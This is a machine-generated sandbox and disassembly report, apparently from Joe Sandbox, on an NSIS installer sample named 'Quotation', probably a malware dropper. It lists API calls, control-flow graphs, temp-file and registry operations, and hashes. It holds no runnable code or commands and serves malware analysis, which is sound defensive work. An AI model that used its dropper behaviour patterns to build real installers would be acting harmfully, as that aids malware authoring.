                                                              • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll,?,?,00000000,00000000,00418EC0,00000000), ref: 00406728
                                                              • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll,?,?,00000000,00000000,00418EC0,00000000), ref: 00406782
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                              • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                              • API String ID: 4024019347-2122288266
                                                              • Opcode ID: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                                              • Instruction ID: c1bee3e663878f3afad94de22ef935420ccf361ce06c76a1d76179cfc985cdfa
                                                              • Opcode Fuzzy Hash: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                                              • Instruction Fuzzy Hash: 266146B1A043019BDB205F28DD80B6B77E4AF84318F65053FF646B32D1DA7D89A18B5E

                                                              Control-flow Graph

                                                              control_flow_graph 573 401774-401799 call 402dab call 405e67 578 4017a3-4017b5 call 406521 call 405df0 lstrcatW 573->578 579 40179b-4017a1 call 406521 573->579 584 4017ba-4017bb call 4067cf 578->584 579->584 588 4017c0-4017c4 584->588 589 4017c6-4017d0 call 40687e 588->589 590 4017f7-4017fa 588->590 598 4017e2-4017f4 589->598 599 4017d2-4017e0 CompareFileTime 589->599 591 401802-40181e call 406011 590->591 592 4017fc-4017fd call 405fec 590->592 600 401820-401823 591->600 601 401892-4018bb call 4055a6 call 4032b9 591->601 592->591 598->590 599->598 602 401874-40187e call 4055a6 600->602 603 401825-401863 call 406521 * 2 call 40655e call 406521 call 405b81 600->603 615 4018c3-4018cf SetFileTime 601->615 616 4018bd-4018c1 601->616 613 401887-40188d 602->613 603->588 635 401869-40186a 603->635 618 402c38 613->618 617 4018d5-4018e0 CloseHandle 615->617 616->615 616->617 620 4018e6-4018e9 617->620 621 402c2f-402c32 617->621 622 402c3a-402c3e 618->622 624 4018eb-4018fc call 40655e lstrcatW 620->624 625 4018fe-401901 call 40655e 620->625 621->618 632 401906-40239d 624->632 625->632 636 4023a2-4023a7 632->636 637 40239d call 405b81 632->637 635->613 638 40186c-40186d 635->638 636->622 637->636 638->602
                                                              APIs
                                                              • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\ethnocentrism\skggene\Egyptians218,?,?,00000031), ref: 004017B5
                                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\ethnocentrism\skggene\Egyptians218,?,?,00000031), ref: 004017DA
                                                                • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
                                                                • Part of subcall function 004055A6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
                                                                • Part of subcall function 004055A6: lstrlenW.KERNEL32(004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
                                                                • Part of subcall function 004055A6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll,004033F2,004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll,00000000,00418EC0,00000000), ref: 00405601
                                                                • Part of subcall function 004055A6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll), ref: 00405613
                                                                • Part of subcall function 004055A6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
                                                                • Part of subcall function 004055A6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
                                                                • Part of subcall function 004055A6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsd350B.tmp$C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll$C:\Users\user\ethnocentrism\skggene\Egyptians218$Call
                                                              • API String ID: 1941528284-1453440118
                                                              • Opcode ID: 8735ad9560c18e5a7f29f6a8244760e17f86ea249fb7e5f19f194b0f67ebe764
                                                              • Instruction ID: 1777f765e23ed303a4c4324df0f40fc052c607b9e3f25272d24a03cacca2a4dc
                                                              • Opcode Fuzzy Hash: 8735ad9560c18e5a7f29f6a8244760e17f86ea249fb7e5f19f194b0f67ebe764
                                                              • Instruction Fuzzy Hash: 9E41A531900509BACF117BA9DD86DAF3AB5EF45328B20423FF512B10E1DB3C8A52966D

                                                              Control-flow Graph
                                                              control_flow_graph 639 4055a6-4055bb 640 4055c1-4055d2 639->640 641 405672-405676 639->641 642 4055d4-4055d8 call 40655e 640->642 643 4055dd-4055e9 lstrlenW 640->643 642->643 645 405606-40560a 643->645 646 4055eb-4055fb lstrlenW 643->646 648 405619-40561d 645->648 649 40560c-405613 SetWindowTextW 645->649 646->641 647 4055fd-405601 lstrcatW 646->647 647->645 650 405663-405665 648->650 651 40561f-405661 SendMessageW * 3 648->651 649->648 650->641 652 405667-40566a 650->652 651->650 652->641
                                                              APIs
                                                              • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
                                                              • lstrlenW.KERNEL32(004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
                                                              • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll,004033F2,004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll,00000000,00418EC0,00000000), ref: 00405601
                                                              • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll), ref: 00405613
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                              • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll
                                                              • API String ID: 2531174081-2743594400
                                                              • Opcode ID: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                              • Instruction ID: deb6953f75989b306d4e6df0e2073f5bc52164b7b2c012b705af3b177d86a23e
                                                              • Opcode Fuzzy Hash: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                              • Instruction Fuzzy Hash: 8F21B375900158BACB119FA5DD84ECFBF75EF45364F50803AF944B22A0C77A4A51CF68

                                                              Control-flow Graph
                                                              control_flow_graph 653 4026f1-40270a call 402d89 656 402710-402717 653->656 657 402c2f-402c32 653->657 658 402719 656->658 659 40271c-40271f 656->659 660 402c38-402c3e 657->660 658->659 661 402883-40288b 659->661 662 402725-402734 call 406481 659->662 661->657 662->661 666 40273a 662->666 667 402740-402744 666->667 668 4027d9-4027dc 667->668 669 40274a-402765 ReadFile 667->669 670 4027f4-402804 call 406094 668->670 671 4027de-4027e1 668->671 669->661 672 40276b-402770 669->672 670->661 682 402806 670->682 671->670 673 4027e3-4027ee call 4060f2 671->673 672->661 675 402776-402784 672->675 673->661 673->670 678 40278a-40279c MultiByteToWideChar 675->678 679 40283f-40284b call 406468 675->679 678->682 683 40279e-4027a1 678->683 679->660 686 402809-40280c 682->686 684 4027a3-4027ae 683->684 684->686 687 4027b0-4027d5 SetFilePointer MultiByteToWideChar 684->687 686->679 688 40280e-402813 686->688 687->684 689 4027d7 687->689 690 402850-402854 688->690 691 402815-40281a 688->691 689->682 692 402871-40287d SetFilePointer 690->692 693 402856-40285a 690->693 691->690 694 40281c-40282f 691->694 692->661 696 402862-40286f 693->696 697 40285c-402860 693->697 694->661 695 402831-402837 694->695 695->667 698 40283d 695->698 696->661 697->692 697->696 698->661
                                                              APIs
                                                              • ReadFile.KERNELBASE(?,?,?,?), ref: 0040275D
                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402798
                                                              • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 004027BB
                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 004027D1
                                                                • Part of subcall function 004060F2: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00406108
                                                              • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 0040287D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                              • String ID: 9
                                                              • API String ID: 163830602-2366072709
                                                              • Opcode ID: 0fe20a848d4a285c173513a47146d0bdd1f0b43cc80ef0beb9e6d9777ffbd6ad
                                                              • Instruction ID: 4938fc2aff7960a3a7fedf371d3c64c497049ea43b58312dd80c80f6ae9549af
                                                              • Opcode Fuzzy Hash: 0fe20a848d4a285c173513a47146d0bdd1f0b43cc80ef0beb9e6d9777ffbd6ad
                                                              • Instruction Fuzzy Hash: 5051FB75D0421AABDF249FD4CA84AAEBB79FF04344F10817BE901B62D0D7B49D828B58

                                                              Control-flow Graph
                                                              control_flow_graph 699 4032b9-4032d0 700 4032d2 699->700 701 4032d9-4032e1 699->701 700->701 702 4032e3 701->702 703 4032e8-4032ed 701->703 702->703 704 4032fd-40330a call 40349e 703->704 705 4032ef-4032f8 call 4034b4 703->705 709 403310-403314 704->709 710 403455 704->710 705->704 711 40331a-40333a GetTickCount call 406a70 709->711 712 40343e-403440 709->712 713 403457-403458 710->713 725 403494 711->725 727 403340-403348 711->727 715 403442-403445 712->715 716 403489-40348d 712->716 714 403497-40349b 713->714 718 403447 715->718 719 40344a-403453 call 40349e 715->719 720 40345a-403460 716->720 721 40348f 716->721 718->719 719->710 733 403491 719->733 723 403462 720->723 724 403465-403473 call 40349e 720->724 721->725 723->724 724->710 736 403475-403481 call 4060c3 724->736 725->714 730 40334a 727->730 731 40334d-40335b call 40349e 727->731 730->731 731->710 737 403361-40336a 731->737 733->725 742 403483-403486 736->742 743 40343a-40343c 736->743 739 403370-40338d call 406a90 737->739 745 403393-4033aa GetTickCount 739->745 746 403436-403438 739->746 742->716 743->713 747 4033f5-4033f7 745->747 748 4033ac-4033b4 745->748 746->713 751 4033f9-4033fd 747->751 752 40342a-40342e 747->752 749 4033b6-4033ba 748->749 750 4033bc-4033ed MulDiv wsprintfW call 4055a6 748->750 749->747 749->750 758 4033f2 750->758 755 403412-403418 751->755 756 4033ff-403404 call 4060c3 751->756 752->727 753 403434 752->753 753->725 757 40341e-403422 755->757 761 403409-40340b 756->761 757->739 760 403428 757->760 758->747 760->725 761->743 762 40340d-403410 761->762 762->757
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: CountTick$wsprintf
                                                              • String ID: ... %d%%
                                                              • API String ID: 551687249-2449383134
                                                              • Opcode ID: bb69fc25e18161a0849df33240b9b7daf63c30e93ac5b68caaa3da3af3354023
                                                              • Instruction ID: 25ee467b37f7358b1d8943912f63d539eb3ef7c07a249f5ee2dc3eaa61b9464a
                                                              • Opcode Fuzzy Hash: bb69fc25e18161a0849df33240b9b7daf63c30e93ac5b68caaa3da3af3354023
                                                              • Instruction Fuzzy Hash: 5B518E31900219EBCB11DF65DA44BAF3FA8AB40726F14417BF804BB2C1D7789E408BA9

                                                              Control-flow Graph
                                                              control_flow_graph 763 4068a5-4068c5 GetSystemDirectoryW 764 4068c7 763->764 765 4068c9-4068cb 763->765 764->765 766 4068dc-4068de 765->766 767 4068cd-4068d6 765->767 769 4068df-406912 wsprintfW LoadLibraryExW 766->769 767->766 768 4068d8-4068da 767->768 768->769
                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068BC
                                                              • wsprintfW.USER32 ref: 004068F7
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040690B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                              • String ID: %s%S.dll$UXTHEME
                                                              • API String ID: 2200240437-1106614640
                                                              • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                              • Instruction ID: d40490b37a95929041f6b14fe17981fa15644a851550e805e000283098582d10
                                                              • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                              • Instruction Fuzzy Hash: 41F0FC31511119AACF10BB64DD0DF9B375C9B00305F10847AE546F10D0EB789A68CBA8

                                                              Control-flow Graph
                                                              control_flow_graph 770 402eae-402ed7 call 40638e 772 402edc-402ee0 770->772 773 402f91-402f95 772->773 774 402ee6-402eea 772->774 775 402eec-402f0d RegEnumValueW 774->775 776 402f0f-402f22 774->776 775->776 777 402f76-402f84 RegCloseKey 775->777 778 402f4b-402f52 RegEnumKeyW 776->778 777->773 779 402f24-402f26 778->779 780 402f54-402f66 RegCloseKey call 406915 778->780 779->777 781 402f28-402f3c call 402eae 779->781 785 402f86-402f8c 780->785 786 402f68-402f74 RegDeleteKeyW 780->786 781->780 788 402f3e-402f4a 781->788 785->773 786->773 788->778
                                                              APIs
                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: CloseEnum$DeleteValue
                                                              • String ID:
                                                              • API String ID: 1354259210-0
                                                              • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                              • Instruction ID: 48bf034c557530f45265713f896c64b121a5f1f2f5b25ab6521791cb913d5ed3
                                                              • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                              • Instruction Fuzzy Hash: 74215A7150010ABFDF119F90CE89EEF7B7DEB54388F110076B949B11A0D7B49E54AA68

                                                              Control-flow Graph
                                                              control_flow_graph 789 73421817-73421856 call 73421bff 793 73421976-73421978 789->793 794 7342185c-73421860 789->794 795 73421862-73421868 call 7342243e 794->795 796 73421869-73421876 call 73422480 794->796 795->796 801 734218a6-734218ad 796->801 802 73421878-7342187d 796->802 803 734218af-734218cb call 73422655 call 73421654 call 73421312 GlobalFree 801->803 804 734218cd-734218d1 801->804 805 73421898-7342189b 802->805 806 7342187f-73421880 802->806 827 73421925-73421929 803->827 810 734218d3-7342191c call 73421666 call 73422655 804->810 811 7342191e-73421924 call 73422655 804->811 805->801 812 7342189d-7342189e call 73422e23 805->812 808 73421882-73421883 806->808 809 73421888-73421889 call 73422b98 806->809 815 73421890-73421896 call 73422810 808->815 816 73421885-73421886 808->816 823 7342188e 809->823 810->827 811->827 820 734218a3 812->820 826 734218a5 815->826 816->801 816->809 820->826 823->820 826->801 831 73421966-7342196d 827->831 832 7342192b-73421939 call 73422618 827->832 831->793 837 7342196f-73421970 GlobalFree 831->837 839 73421951-73421958 832->839 840 7342193b-7342193e 832->840 837->793 839->831 842 7342195a-73421965 call 734215dd 839->842 840->839 841 73421940-73421948 840->841 841->839 843 7342194a-7342194b FreeLibrary 841->843 842->831 843->839
                                                              APIs
                                                                • Part of subcall function 73421BFF: GlobalFree.KERNEL32(?), ref: 73421E74
                                                                • Part of subcall function 73421BFF: GlobalFree.KERNEL32(?), ref: 73421E79
                                                                • Part of subcall function 73421BFF: GlobalFree.KERNEL32(?), ref: 73421E7E
                                                              • GlobalFree.KERNEL32(00000000), ref: 734218C5
                                                              • FreeLibrary.KERNEL32(?), ref: 7342194B
                                                              • GlobalFree.KERNEL32(00000000), ref: 73421970
                                                                • Part of subcall function 7342243E: GlobalAlloc.KERNEL32(00000040,?), ref: 7342246F
                                                                • Part of subcall function 73422810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73421896,00000000), ref: 734228E0
                                                                • Part of subcall function 73421666: wsprintfW.USER32 ref: 73421694
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2432204448.0000000073421000.00000020.00000001.01000000.00000005.sdmp, Offset: 73420000, based on PE: true
                                                              • Associated: 00000000.00000002.2432044113.0000000073420000.00000002.00000001.01000000.00000005.sdmp
                                                              • Associated: 00000000.00000002.2432399195.0000000073424000.00000002.00000001.01000000.00000005.sdmp
                                                              • Associated: 00000000.00000002.2432790406.0000000073426000.00000002.00000001.01000000.00000005.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_73420000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Global$Free$Alloc$Librarywsprintf
                                                              • String ID:
                                                              • API String ID: 3962662361-3916222277
                                                              • Opcode ID: 2f991ef0a9332dbd4685eb1006dab531fafd388fd698e7374459a483a2cf0cde
                                                              • Instruction ID: a9d466580fe9d3dcc9ed44e3f3995c2a9418dab8de845a2dd23d32ca0e66ed9e
                                                              • Opcode Fuzzy Hash: 2f991ef0a9332dbd4685eb1006dab531fafd388fd698e7374459a483a2cf0cde
                                                              • Instruction Fuzzy Hash: BD418272400345AFEB0D9F25DCC4B953FBCAF05356F184469ED4BBA2C6DB788085CAA8
                                                              APIs
                                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsd350B.tmp,00000023,00000011,00000002), ref: 004024DA
                                                              • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,00000000,00000011,00000002), ref: 0040251A
                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,00000000,00000011,00000002), ref: 00402602
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: CloseValuelstrlen
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsd350B.tmp
                                                              • API String ID: 2655323295-3684517792
                                                              • Opcode ID: 8e1b5111da33e5837339166b14f546e7548dccb5c0fd5daf16ba01e681e634b0
                                                              • Instruction ID: 9515a87f615354861ff9cc8d48f56862c3e7cd04d157db2ad705c0a1b7eb65e0
                                                              • Opcode Fuzzy Hash: 8e1b5111da33e5837339166b14f546e7548dccb5c0fd5daf16ba01e681e634b0
                                                              • Instruction Fuzzy Hash: 45116D71900118BEEB11EFA5DE59AAEBAB4AF54318F10443FF504B61C1C7B98E419A58
                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 0040605E
                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004034FA,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6), ref: 00406079
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
